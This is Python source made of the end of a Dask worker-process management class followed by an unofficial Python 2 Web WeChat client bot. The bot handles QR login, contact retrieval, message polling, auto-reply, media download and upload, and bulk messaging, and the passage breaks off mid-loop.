self.on_exit(r)
async def kill(self, timeout: float = 2, executor_wait: bool = True):
"""
Ensure the worker process is stopped, waiting at most
*timeout* seconds before terminating it abruptly.
"""
deadline = time() + timeout
if self.status == Status.stopped:
return
if self.status == Status.stopping:
await self.stopped.wait()
return
assert self.status in (Status.starting, Status.running)
self.status = Status.stopping
process = self.process
self.child_stop_q.put(
{
"op": "stop",
"timeout": max(0, deadline - time()) * 0.8,
"executor_wait": executor_wait,
}
)
await asyncio.sleep(0) # otherwise we get broken pipe errors
self.child_stop_q.close()
while process.is_alive() and time() < deadline:
await asyncio.sleep(0.05)
if process.is_alive():
logger.warning(
f"Worker process still alive after {timeout} seconds, killing"
)
try:
await process.terminate()
except Exception as e:
logger.error("Failed to kill worker process: %s", e)
async def _wait_until_connected(self, uid):
while True:
if self.status != Status.starting:
return
# This is a multiprocessing queue and we'd block the event loop if
# we simply called get
try:
msg = self.init_result_q.get_nowait()
except Empty:
await asyncio.sleep(self._init_msg_interval)
continue
if msg["uid"] != uid: # ensure that we didn't cross queues
continue
if "exception" in msg:
logger.error(
"Failed while trying to start worker process: %s", msg["exception"]
)
raise msg["exception"]
else:
return msg
@classmethod
def _run(
cls,
worker_kwargs,
worker_start_args,
silence_logs,
init_result_q,
child_stop_q,
uid,
env,
config,
Worker,
): # pragma: no cover
try:
os.environ.update(env)
dask.config.set(config)
try:
from dask.multiprocessing import initialize_worker_process
except ImportError: # old Dask version
pass
else:
initialize_worker_process()
if silence_logs:
logger.setLevel(silence_logs)
IOLoop.clear_instance()
loop = IOLoop()
loop.make_current()
worker = Worker(**worker_kwargs)
async def do_stop(timeout=5, executor_wait=True):
try:
await worker.close(
report=True,
nanny=False,
safe=True, # TODO: Graceful or not?
executor_wait=executor_wait,
timeout=timeout,
)
finally:
loop.stop()
def watch_stop_q():
"""
Wait for an incoming stop message and then stop the
worker cleanly.
"""
while True:
try:
msg = child_stop_q.get(timeout=1000)
except Empty:
pass
else:
child_stop_q.close()
assert msg.pop("op") == "stop"
loop.add_callback(do_stop, **msg)
break
t = threading.Thread(target=watch_stop_q, name="Nanny stop queue watch")
t.daemon = True
t.start()
async def run():
"""
Try to start worker and inform parent of outcome.
"""
try:
await worker
except Exception as e:
logger.exception("Failed to start worker")
init_result_q.put({"uid": uid, "exception": e})
init_result_q.close()
# If we hit an exception here we need to wait for a least
# one interval for the outside to pick up this message.
# Otherwise we arrive in a race condition where the process
# cleanup wipes the queue before the exception can be
# properly handled. See also
# WorkerProcess._wait_until_connected (the 2 is for good
# measure)
sync_sleep(cls._init_msg_interval * 2)
else:
try:
assert worker.address
except ValueError:
pass
else:
init_result_q.put(
{
"address": worker.address,
"dir": worker.local_directory,
"uid": uid,
}
)
init_result_q.close()
await worker.finished()
logger.info("Worker closed")
except Exception as e:
logger.exception("Failed to initialize Worker")
init_result_q.put({"uid": uid, "exception": e})
init_result_q.close()
# If we hit an exception here we need to wait for a least one
# interval for the outside to pick up this message. Otherwise we
# arrive in a race condition where the process cleanup wipes the
# queue before the exception can be properly handled. See also
# WorkerProcess._wait_until_connected (the 2 is for good measure)
sync_sleep(cls._init_msg_interval * 2)
else:
try:
loop.run_sync(run)
except (TimeoutError, gen.TimeoutError):
# Loop was stopped before wait_until_closed() returned, ignore
pass
except KeyboardInterrupt:
# At this point the loop is not running thus we have to run
# do_stop() explicitly.
loop.run_sync(do_stop)
|
weixin.py | #!/usr/bin/env python
# coding: utf-8
import qrcode
import urllib
import urllib2
import cookielib
import requests
import xml.dom.minidom
import json
import time
import re
import sys
import os
import random
import multiprocessing
import platform
import logging
from collections import defaultdict
from urlparse import urlparse
from lxml import html
# for media upload
import mimetypes
from requests_toolbelt.multipart.encoder import MultipartEncoder
def catchKeyboardInterrupt(fn):
def wrapper(*args):
try:
return fn(*args)
except KeyboardInterrupt:
print '\n[*] 强制退出程序'
logging.debug('[*] 强制退出程序')
return wrapper
def _decode_list(data):
rv = []
for item in data:
if isinstance(item, unicode):
item = item.encode('utf-8')
elif isinstance(item, list):
item = _decode_list(item)
elif isinstance(item, dict):
item = _decode_dict(item)
rv.append(item)
return rv
def _decode_dict(data):
rv = {}
for key, value in data.iteritems():
if isinstance(key, unicode):
key = key.encode('utf-8')
if isinstance(value, unicode):
value = value.encode('utf-8')
elif isinstance(value, list):
value = _decode_list(value)
elif isinstance(value, dict):
value = _decode_dict(value)
rv[key] = value
return rv
class WebWeixin(object):
def __str__(self):
description = \
"=========================\n" + \
"[#] Web Weixin\n" + \
"[#] Debug Mode: " + str(self.DEBUG) + "\n" + \
"[#] Uuid: " + self.uuid + "\n" + \
"[#] Uin: " + str(self.uin) + "\n" + \
"[#] Sid: " + self.sid + "\n" + \
"[#] Skey: " + self.skey + "\n" + \
"[#] DeviceId: " + self.deviceId + "\n" + \
"[#] PassTicket: " + self.pass_ticket + "\n" + \
"========================="
return description
def __init__(self):
self.DEBUG = False
self.uuid = ''
self.base_uri = ''
self.redirect_uri = ''
self.uin = ''
self.sid = ''
self.skey = ''
self.pass_ticket = ''
self.deviceId = 'e' + repr(random.random())[2:17]
self.BaseRequest = {}
self.synckey = ''
self.SyncKey = []
self.User = []
self.MemberList = []
self.ContactList = [] # 好友
self.GroupList = [] # 群
self.GroupMemeberList = [] # 群友
self.PublicUsersList = [] # 公众号/服务号
self.SpecialUsersList = [] # 特殊账号
self.autoReplyMode = True
self.syncHost = ''
self.user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'
self.interactive = False
self.autoOpen = False
self.saveFolder = os.path.join(os.getcwd(), 'saved')
self.saveSubFolders = {'webwxgeticon': 'icons', 'webwxgetheadimg': 'headimgs', 'webwxgetmsgimg': 'msgimgs',
'webwxgetvideo': 'videos', 'webwxgetvoice': 'voices', '_showQRCodeImg': 'qrcodes'}
self.appid = 'wx782c26e4c19acffb'
self.lang = 'zh_CN'
self.lastCheckTs = time.time()
self.memberCount = 0
self.SpecialUsers = ['newsapp', 'fmessage', 'filehelper', 'weibo', 'qqmail', 'fmessage', 'tmessage', 'qmessage', 'qqsync', 'floatbottle', 'lbsapp', 'shakeapp', 'medianote', 'qqfriend', 'readerapp', 'blogapp', 'facebookapp', 'masssendapp', 'meishiapp', 'feedsapp',
'voip', 'blogappweixin', 'weixin', 'brandsessionholder', 'weixinreminder', 'wxid_novlwrv3lqwv11', 'gh_22b87fa7cb3c', 'officialaccounts', 'notification_messages', 'wxid_novlwrv3lqwv11', 'gh_22b87fa7cb3c', 'wxitil', 'userexperience_alarm', 'notification_messages']
self.TimeOut = 20 # 同步最短时间间隔(单位:秒)
self.media_count = -1
self.cookie = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie))
opener.addheaders = [('User-agent', self.user_agent)]
urllib2.install_opener(opener)
def loadConfig(self, config):
if config['DEBUG']:
self.DEBUG = config['DEBUG']
if config['autoReplyMode']:
self.autoReplyMode = config['autoReplyMode']
if config['user_agent']:
self.user_agent = config['user_agent']
if config['interactive']:
self.interactive = config['interactive']
if config['autoOpen']:
self.autoOpen = config['autoOpen']
def getUUID(self):
url = 'https://login.weixin.qq.com/jslogin'
params = {
'appid': self.appid,
'fun': 'new',
'lang': self.lang,
'_': int(time.time()),
}
data = self._post(url, params, False)
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)"'
pm = re.search(regx, data)
if pm:
code = pm.group(1)
self.uuid = pm.group(2)
return code == '200'
return False
def genQRCode(self):
if sys.platform.startswith('win'):
self._showQRCodeImg()
else:
self._str2qr('https://login.weixin.qq.com/l/' + self.uuid)
def _showQRCodeImg(self):
url = 'https://login.weixin.qq.com/qrcode/' + self.uuid
params = {
't': 'webwx',
'_': int(time.time())
}
data = self._post(url, params, False)
QRCODE_PATH = self._saveFile('qrcode.jpg', data, '_showQRCodeImg')
os.startfile(QRCODE_PATH)
def waitForLogin(self, tip=1):
time.sleep(tip)
url = 'https://login.weixin.qq.com/cgi-bin/mmwebwx-bin/login?tip=%s&uuid=%s&_=%s' % (
tip, self.uuid, int(time.time()))
data = self._get(url)
pm = re.search(r'window.code=(\d+);', data)
code = pm.group(1)
if code == '201':
return True
elif code == '200':
pm = re.search(r'window.redirect_uri="(\S+?)";', data)
r_uri = pm.group(1) + '&fun=new'
self.redirect_uri = r_uri
self.base_uri = r_uri[:r_uri.rfind('/')]
return True
elif code == '408':
self._echo('[登陆超时] \n')
else:
self._echo('[登陆异常] \n')
return False
def login(self):
data = self._get(self.redirect_uri)
doc = xml.dom.minidom.parseString(data)
root = doc.documentElement
for node in root.childNodes:
if node.nodeName == 'skey':
self.skey = node.childNodes[0].data
elif node.nodeName == 'wxsid':
self.sid = node.childNodes[0].data
elif node.nodeName == 'wxuin':
self.uin = node.childNodes[0].data
elif node.nodeName == 'pass_ticket':
self.pass_ticket = node.childNodes[0].data
if '' in (self.skey, self.sid, self.uin, self.pass_ticket):
return False
self.BaseRequest = {
'Uin': int(self.uin),
'Sid': self.sid,
'Skey': self.skey,
'DeviceID': self.deviceId,
}
return True
def webwxinit(self):
url = self.base_uri + '/webwxinit?pass_ticket=%s&skey=%s&r=%s' % (
self.pass_ticket, self.skey, int(time.time()))
params = {
'BaseRequest': self.BaseRequest
}
dic = self._post(url, params)
self.SyncKey = dic['SyncKey']
self.User = dic['User']
# synckey for synccheck
self.synckey = '|'.join(
[str(keyVal['Key']) + '_' + str(keyVal['Val']) for keyVal in self.SyncKey['List']])
return dic['BaseResponse']['Ret'] == 0
def webwxstatusnotify(self):
url = self.base_uri + \
'/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % (self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Code": 3,
"FromUserName": self.User['UserName'],
"ToUserName": self.User['UserName'],
"ClientMsgId": int(time.time())
}
dic = self._post(url, params)
return dic['BaseResponse']['Ret'] == 0
def webwxgetcontact(self):
SpecialUsers = self.SpecialUsers
print self.base_uri
url = self.base_uri + '/webwxgetcontact?pass_ticket=%s&skey=%s&r=%s' % (
self.pass_ticket, self.skey, int(time.time()))
dic = self._post(url, {})
self.MemberCount = dic['MemberCount']
self.MemberList = dic['MemberList']
ContactList = self.MemberList[:]
GroupList = self.GroupList[:]
PublicUsersList = self.PublicUsersList[:]
SpecialUsersList = self.SpecialUsersList[:]
for i in xrange(len(ContactList) - 1, -1, -1):
Contact = ContactList[i]
if Contact['VerifyFlag'] & 8 != 0: # 公众号/服务号
ContactList.remove(Contact)
self.PublicUsersList.append(Contact)
elif Contact['UserName'] in SpecialUsers: # 特殊账号
ContactList.remove(Contact)
self.SpecialUsersList.append(Contact)
elif Contact['UserName'].find('@@') != -1: # 群聊
ContactList.remove(Contact)
self.GroupList.append(Contact)
elif Contact['UserName'] == self.User['UserName']: # 自己
ContactList.remove(Contact)
self.ContactList = ContactList
return True
def webwxbatchgetcontact(self):
url = self.base_uri + \
'/webwxbatchgetcontact?type=ex&r=%s&pass_ticket=%s' % (
int(time.time()), self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Count": len(self.GroupList),
"List": [{"UserName": g['UserName'], "EncryChatRoomId":""} for g in self.GroupList]
}
dic = self._post(url, params)
# blabla ...
ContactList = dic['ContactList']
ContactCount = dic['Count']
self.GroupList = ContactList
for i in xrange(len(ContactList) - 1, -1, -1):
Contact = ContactList[i]
MemberList = Contact['MemberList']
for member in MemberList:
self.GroupMemeberList.append(member)
return True
def getNameById(self, id):
url = self.base_uri + \
'/webwxbatchgetcontact?type=ex&r=%s&pass_ticket=%s' % (
int(time.time()), self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Count": 1,
"List": [{"UserName": id, "EncryChatRoomId": ""}]
}
dic = self._post(url, params)
# blabla ...
return dic['ContactList']
def testsynccheck(self):
SyncHost = [
'webpush.weixin.qq.com',
'webpush2.weixin.qq.com',
'webpush.wechat.com',
'webpush1.wechat.com',
'webpush2.wechat.com',
'webpush1.wechatapp.com',
# 'webpush.wechatapp.com'
]
for host in SyncHost:
self.syncHost = host
[retcode, selector] = self.synccheck()
if retcode == '0':
return True
return False
def synccheck(self):
params = {
'r': int(time.time()),
'sid': self.sid,
'uin': self.uin,
'skey': self.skey,
'deviceid': self.deviceId,
'synckey': self.synckey,
'_': int(time.time()),
}
url = 'https://' + self.syncHost + \
'/cgi-bin/mmwebwx-bin/synccheck?' + urllib.urlencode(params)
data = self._get(url)
pm = re.search(
r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}', data)
retcode = pm.group(1)
selector = pm.group(2)
return [retcode, selector]
def webwxsync(self):
url = self.base_uri + \
'/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % (
self.sid, self.skey, self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
'SyncKey': self.SyncKey,
'rr': ~int(time.time())
}
dic = self._post(url, params)
if self.DEBUG:
print json.dumps(dic, indent=4)
logging.debug(json.dumps(dic, indent=4))
if dic['BaseResponse']['Ret'] == 0:
self.SyncKey = dic['SyncKey']
self.synckey = '|'.join(
[str(keyVal['Key']) + '_' + str(keyVal['Val']) for keyVal in self.SyncKey['List']])
return dic
def webwxsendmsg(self, word, to='filehelper'):
url = self.base_uri + \
'/webwxsendmsg?pass_ticket=%s' % (self.pass_ticket)
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
params = {
'BaseRequest': self.BaseRequest,
'Msg': {
"Type": 1,
"Content": self._transcoding(word),
"FromUserName": self.User['UserName'],
"ToUserName": to,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(params, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
return dic['BaseResponse']['Ret'] == 0
def webwxuploadmedia(self, image_name):
url = 'https://file2.wx.qq.com/cgi-bin/mmwebwx-bin/webwxuploadmedia?f=json'
# 计数器
self.media_count = self.media_count + 1
# 文件名
file_name = image_name
# MIME格式
# mime_type = application/pdf, image/jpeg, image/png, etc.
mime_type = mimetypes.guess_type(image_name, strict=False)[0]
# 微信识别的文档格式,微信服务器应该只支持两种类型的格式。pic和doc
# pic格式,直接显示。doc格式则显示为文件。
media_type = 'pic' if mime_type.split('/')[0] == 'image' else 'doc'
# 上一次修改日期
lastModifieDate = 'Thu Mar 17 2016 00:55:10 GMT+0800 (CST)'
# 文件大小
file_size = os.path.getsize(file_name)
# PassTicket
pass_ticket = self.pass_ticket
# clientMediaId
client_media_id = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
# webwx_data_ticket
webwx_data_ticket = ''
for item in self.cookie:
if item.name == 'webwx_data_ticket':
webwx_data_ticket = item.value
break
if (webwx_data_ticket == ''):
return "None Fuck Cookie"
uploadmediarequest = json.dumps({
"BaseRequest": self.BaseRequest,
"ClientMediaId": client_media_id,
"TotalLen": file_size,
"StartPos": 0,
"DataLen": file_size,
"MediaType": 4
}, ensure_ascii=False).encode('utf8')
multipart_encoder = MultipartEncoder(
fields={
'id': 'WU_FILE_' + str(self.media_count),
'name': file_name,
'type': mime_type,
'lastModifieDate': lastModifieDate,
'size': str(file_size),
'mediatype': media_type,
'uploadmediarequest': uploadmediarequest,
'webwx_data_ticket': webwx_data_ticket,
'pass_ticket': pass_ticket,
'filename': (file_name, open(file_name, 'rb'), mime_type.split('/')[1])
},
boundary='-----------------------------1575017231431605357584454111'
)
headers = {
'Host': 'file2.wx.qq.com',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'https://wx2.qq.com/',
'Content-Type': multipart_encoder.content_type,
'Origin': 'https://wx2.qq.com',
'Connection': 'keep-alive',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache'
}
r = requests.post(url, data=multipart_encoder, headers=headers)
response_json = r.json()
if response_json['BaseResponse']['Ret'] == 0:
return response_json
return None
def webwxsendmsgimg(self, user_id, media_id):
url = 'https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxsendmsgimg?fun=async&f=json&pass_ticket=%s' % self.pass_ticket
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
data_json = {
"BaseRequest": self.BaseRequest,
"Msg": {
"Type": 3,
"MediaId": media_id,
"FromUserName": self.User['UserName'],
"ToUserName": user_id,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(data_json, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
return dic['BaseResponse']['Ret'] == 0
def webwxsendmsgemotion(self, user_id, media_id):
url = 'https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxsendemoticon?fun=sys&f=json&pass_ticket=%s' % self.pass_ticket
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
data_json = {
"BaseRequest": self.BaseRequest,
"Msg": {
"Type": 47,
"EmojiFlag": 2,
"MediaId": media_id,
"FromUserName": self.User['UserName'],
"ToUserName": user_id,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(data_json, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
if self.DEBUG:
print json.dumps(dic, indent=4)
logging.debug(json.dumps(dic, indent=4))
return dic['BaseResponse']['Ret'] == 0
def _saveFile(self, filename, data, api=None):
fn = filename
if self.saveSubFolders[api]:
dirName = os.path.join(self.saveFolder, self.saveSubFolders[api])
if not os.path.exists(dirName):
os.makedirs(dirName)
fn = os.path.join(dirName, filename)
logging.debug('Saved file: %s' % fn)
with open(fn, 'wb') as f:
f.write(data)
f.close()
return fn
def webwxgeticon(self, id):
url = self.base_uri + \
'/webwxgeticon?username=%s&skey=%s' % (id, self.skey)
data = self._get(url)
fn = 'img_' + id + '.jpg'
return self._saveFile(fn, data, 'webwxgeticon')
def webwxgetheadimg(self, id):
url = self.base_uri + \
'/webwxgetheadimg?username=%s&skey=%s' % (id, self.skey)
data = self._get(url)
fn = 'img_' + id + '.jpg'
return self._saveFile(fn, data, 'webwxgetheadimg')
def webwxgetmsgimg(self, msgid):
url = self.base_uri + \
'/webwxgetmsgimg?MsgID=%s&skey=%s' % (msgid, self.skey)
data = self._get(url)
fn = 'img_' + msgid + '.jpg'
return self._saveFile(fn, data, 'webwxgetmsgimg')
# Not work now for weixin haven't support this API
def webwxgetvideo(self, msgid):
url = self.base_uri + \
'/webwxgetvideo?msgid=%s&skey=%s' % (msgid, self.skey)
data = self._get(url, api='webwxgetvideo')
fn = 'video_' + msgid + '.mp4'
return self._saveFile(fn, data, 'webwxgetvideo')
def webwxgetvoice(self, msgid):
url = self.base_uri + \
'/webwxgetvoice?msgid=%s&skey=%s' % (msgid, self.skey)
data = self._get(url)
fn = 'voice_' + msgid + '.mp3'
return self._saveFile(fn, data, 'webwxgetvoice')
def getGroupName(self, id):
name = '未知群'
for member in self.GroupList:
if member['UserName'] == id:
name = member['NickName']
if name == '未知群':
# 现有群里面查不到
GroupList = self.getNameById(id)
for group in GroupList:
self.GroupList.append(group)
if group['UserName'] == id:
name = group['NickName']
MemberList = group['MemberList']
for member in MemberList:
self.GroupMemeberList.append(member)
return name
def getUserRemarkName(self, id):
name = '未知群' if id[:2] == '@@' else '陌生人'
if id == self.User['UserName']:
return self.User['NickName'] # 自己
if id[:2] == '@@':
# 群
name = self.getGroupName(id)
else:
# 特殊账号
for member in self.SpecialUsersList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
# 公众号或服务号
for member in self.PublicUsersList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
# 直接联系人
for member in self.ContactList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
# 群友
for member in self.GroupMemeberList:
if member['UserName'] == id:
name = member['DisplayName'] if member[
'DisplayName'] else member['NickName']
if name == '未知群' or name == '陌生人':
logging.debug(id)
return name
def getUSerID(self, name):
for member in self.MemberList:
if name == member['RemarkName'] or name == member['NickName']:
return member['UserName']
return None
def _showMsg(self, message):
srcName = None
dstName = None
groupName = None
content = None
msg = message
logging.debug(msg)
if msg['raw_msg']:
srcName = self.getUserRemarkName(msg['raw_msg']['FromUserName'])
dstName = self.getUserRemarkName(msg['raw_msg']['ToUserName'])
content = msg['raw_msg']['Content'].replace(
'<', '<').replace('>', '>')
message_id = msg['raw_msg']['MsgId']
if content.find('http://weixin.qq.com/cgi-bin/redirectforward?args=') != -1:
# 地理位置消息
data = self._get(content).decode('gbk').encode('utf-8')
pos = self._searchContent('title', data, 'xml')
tree = html.fromstring(self._get(content))
url = tree.xpath('//html/body/div/img')[0].attrib['src']
for item in urlparse(url).query.split('&'):
if item.split('=')[0] == 'center':
loc = item.split('=')[-1:]
content = '%s 发送了一个 位置消息 - 我在 [%s](%s) @ %s]' % (
srcName, pos, url, loc)
if msg['raw_msg']['ToUserName'] == 'filehelper':
# 文件传输助手
dstName = '文件传输助手'
if msg['raw_msg']['FromUserName'][:2] == '@@':
# 接收到来自群的消息
if re.search(":<br/>", content, re.IGNORECASE):
[people, content] = content.split(':<br/>')
groupName = srcName
srcName = self.getUserRemarkName(people)
dstName = 'GROUP'
else:
groupName = srcName
srcName = 'SYSTEM'
elif msg['raw_msg']['ToUserName'][:2] == '@@':
# 自己发给群的消息
groupName = dstName
dstName = 'GROUP'
# 收到了红包
if content == '收到红包,请在手机上查看':
msg['message'] = content
# 指定了消息内容
if 'message' in msg.keys():
content = msg['message']
if groupName != None:
print '%s |%s| %s -> %s: %s' % (message_id, groupName.strip(), srcName.strip(), dstName.strip(), content.replace('<br/>', '\n'))
logging.info('%s |%s| %s -> %s: %s' % (message_id, groupName.strip(),
srcName.strip(), dstName.strip(), content.replace('<br/>', '\n')))
else:
print '%s %s -> %s: %s' % (message_id, srcName.strip(), dstName.strip(), content.replace('<br/>', '\n'))
logging.info('%s %s -> %s: %s' % (message_id, srcName.strip(),
dstName.strip(), content.replace('<br/>', '\n')))
def handleMsg(self, r):
for msg in r['AddMsgList']:
print '[*] 你有新的消息,请注意查收'
logging.debug('[*] 你有新的消息,请注意查收')
if self.DEBUG:
fn = 'msg' + str(int(random.random() * 1000)) + '.json'
with open(fn, 'w') as f:
f.write(json.dumps(msg))
print '[*] 该消息已储存到文件: ' + fn
logging.debug('[*] 该消息已储存到文件: %s' % (fn))
msgType = msg['MsgType']
name = self.getUserRemarkName(msg['FromUserName'])
content = msg['Content'].replace('<', '<').replace('>', '>')
msgid = msg['MsgId']
if msgType == 1:
raw_msg = {'raw_msg': msg}
self._showMsg(raw_msg)
if self.autoReplyMode:
ans = content + '\n[微信机器人自动回复]'
if self.webwxsendmsg(ans, msg['FromUserName']):
print '自动回复: ' + ans
logging.info('自动回复: ' + ans)
else:
print '自动回复失败'
logging.info('自动回复失败')
elif msgType == 3:
image = self.webwxgetmsgimg(msgid)
raw_msg = {'raw_msg': msg,
'message': '%s 发送了一张图片: %s' % (name, image)}
self._showMsg(raw_msg)
self._safe_open(image)
elif msgType == 34:
voice = self.webwxgetvoice(msgid)
raw_msg = {'raw_msg': msg,
'message': '%s 发了一段语音: %s' % (name, voice)}
self._showMsg(raw_msg)
self._safe_open(voice)
elif msgType == 42:
info = msg['RecommendInfo']
print '%s 发送了一张名片:' % name
print '========================='
print '= 昵称: %s' % info['NickName']
print '= 微信号: %s' % info['Alias']
print '= 地区: %s %s' % (info['Province'], info['City'])
print '= 性别: %s' % ['未知', '男', '女'][info['Sex']]
print '========================='
raw_msg = {'raw_msg': msg, 'message': '%s 发送了一张名片: %s' % (
name.strip(), json.dumps(info))}
self._showMsg(raw_msg)
elif msgType == 47:
url = self._searchContent('cdnurl', content)
raw_msg = {'raw_msg': msg,
'message': '%s 发了一个动画表情,点击下面链接查看: %s' % (name, url)}
self._showMsg(raw_msg)
self._safe_open(url)
elif msgType == 49:
appMsgType = defaultdict(lambda: "")
appMsgType.update({5: '链接', 3: '音乐', 7: '微博'})
print '%s 分享了一个%s:' % (name, appMsgType[msg['AppMsgType']])
print '========================='
print '= 标题: %s' % msg['FileName']
print '= 描述: %s' % self._searchContent('des', content, 'xml')
print '= 链接: %s' % msg['Url']
print '= 来自: %s' % self._searchContent('appname', content, 'xml')
print '========================='
card = {
'title': msg['FileName'],
'description': self._searchContent('des', content, 'xml'),
'url': msg['Url'],
'appname': self._searchContent('appname', content, 'xml')
}
raw_msg = {'raw_msg': msg, 'message': '%s 分享了一个%s: %s' % (
name, appMsgType[msg['AppMsgType']], json.dumps(card))}
self._showMsg(raw_msg)
elif msgType == 51:
raw_msg = {'raw_msg': msg, 'message': '[*] 成功获取联系人信息'}
self._showMsg(raw_msg)
elif msgType == 62:
video = self.webwxgetvideo(msgid)
raw_msg = {'raw_msg': msg,
'message': '%s 发了一段小视频: %s' % (name, video)}
self._showMsg(raw_msg)
self._safe_open(video)
elif msgType == 10002:
raw_msg = {'raw_msg': msg, 'message': '%s 撤回了一条消息' % name}
self._showMsg(raw_msg)
else:
logging.debug('[*] 该消息类型为: %d,可能是表情,图片, 链接或红包: %s' %
(msg['MsgType'], json.dumps(msg)))
raw_msg = {
'raw_msg': msg, 'message': '[*] 该消息类型为: %d,可能是表情,图片, 链接或红包' % msg['MsgType']}
self._showMsg(raw_msg)
def listenMsgMode(self):
print '[*] 进入消息监听模式 ... 成功'
logging.debug('[*] 进入消息监听模式 ... 成功')
self._run('[*] 进行同步线路测试 ... ', self.testsynccheck)
playWeChat = 0
redEnvelope = 0
while True:
self.lastCheckTs = time.time()
[retcode, selector] = self.synccheck()
if self.DEBUG:
print 'retcode: %s, selector: %s' % (retcode, selector)
logging.debug('retcode: %s, selector: %s' % (retcode, selector))
if retcode == '1100':
print '[*] 你在手机上登出了微信,债见'
logging.debug('[*] 你在手机上登出了微信,债见')
break
if retcode == '1101':
print '[*] 你在其他地方登录了 WEB 版微信,债见'
logging.debug('[*] 你在其他地方登录了 WEB 版微信,债见')
break
elif retcode == '0':
if selector == '2':
r = self.webwxsync()
if r is not None:
self.handleMsg(r)
elif selector == '6':
# TODO
redEnvelope += 1
print '[*] 收到疑似红包消息 %d 次' % redEnvelope
logging.debug('[*] 收到疑似红包消息 %d 次' % redEnvelope)
elif selector == '7':
playWeChat += 1
print '[*] 你在手机上玩微信被我发现了 %d 次' % playWeChat
logging.debug('[*] 你在手机上玩微信被我发现了 %d 次' % playWeChat)
r = self.webwxsync()
elif selector == '0':
time.sleep(1)
if (time.time() - self.lastCheckTs) <= 20:
time.sleep(time.time() - self.lastCheckTs)
def sendMsg(self, name, word, isfile=False):
id = self.getUSerID(name)
if id:
if isfile:
with open(word, 'r') as f:
for line in f.readlines():
line = line.replace('\n', '')
self._echo('-> ' + name + ': ' + line)
if self.webwxsendmsg(line, id):
print ' [成功]'
else:
print ' [失败]'
time.sleep(1)
else:
if self.webwxsendmsg(word, id):
print '[*] 消息发送成功'
logging.debug('[*] 消息发送成功')
else:
print '[*] 消息发送失败'
logging.debug('[*] 消息发送失败')
else:
print '[*] 此用户不存在'
logging.debug('[*] 此用户不存在')
def sendMsgToAll(self, word):
for contact in self.ContactList:
name = contact['RemarkName'] if contact[
'RemarkName'] else contact['NickName']
id = contact['UserName']
self._echo('-> ' + name + ': ' + word)
if self.webwxsendmsg(word, id):
print ' [成功]'
else:
print ' [失败]'
time.sleep(1)
def sendImg(self, name, file_name):
response = self.webwxuploadmedia(file_name)
media_id = ""
if response is not None:
media_id = response['MediaId']
user_id = self.getUSerID(name)
response = self.webwxsendmsgimg(user_id, media_id)
def sendEmotion(self, name, file_name):
response = self.webwxuploadmedia(file_name)
media_id = ""
if response is not None:
media_id = response['MediaId']
user_id = self.getUSerID(name)
response = self.webwxsendmsgemotion(user_id, media_id)
@catchKeyboardInterrupt
def start(self):
self._echo('[*] 微信网页版 ... 开动')
print
logging.debug('[*] 微信网页版 ... 开动')
while True:
self._run('[*] 正在获取 uuid ... ', self.getUUID)
self._echo('[*] 正在获取二维码 ... 成功')
print
logging.debug('[*] 微信网页版 ... 开动')
self.genQRCode()
print '[*] 请使用微信扫描二维码以登录 ... '
if not self.waitForLogin():
continue
print '[*] 请在手机上点击确认以登录 ... '
if not self.waitForLogin(0):
continue
break
self._run('[*] 正在登录 ... ', self.login)
self._run('[*] 微信初始化 ... ', self.webwxinit)
self._run('[*] 开启状态通知 ... ', self.webwxstatusnotify)
self._run('[*] 获取联系人 ... ', self.webwxgetcontact)
self._echo('[*] 应有 %s 个联系人,读取到联系人 %d 个' %
(self.MemberCount, len(self.MemberList)))
print
self._echo('[*] 共有 %d 个群 | %d 个直接联系人 | %d 个特殊账号 | %d 公众号或服务号' % (len(self.GroupList),
len(self.ContactList), len(self.SpecialUsersList), len(self.PublicUsersList)))
print
self._run('[*] 获取群 ... ', self.webwxbatchgetcontact)
logging.debug('[*] 微信网页版 ... 开动')
if self.DEBUG:
print self
logging.debug(self)
if self.interactive and raw_input('[*] 是否开启自动回复模式(y/n): ') == 'y':
self.autoReplyMode = True
print '[*] 自动回复模式 ... 开启'
logging.debug('[*] 自动回复模式 ... 开启')
else:
print '[*] 自动回复模式 ... 关闭'
logging.debug('[*] 自动回复模式 ... 关闭')
listenProcess = multiprocessing.Process(target=self.listenMsgMode)
listenProcess.start()
while True:
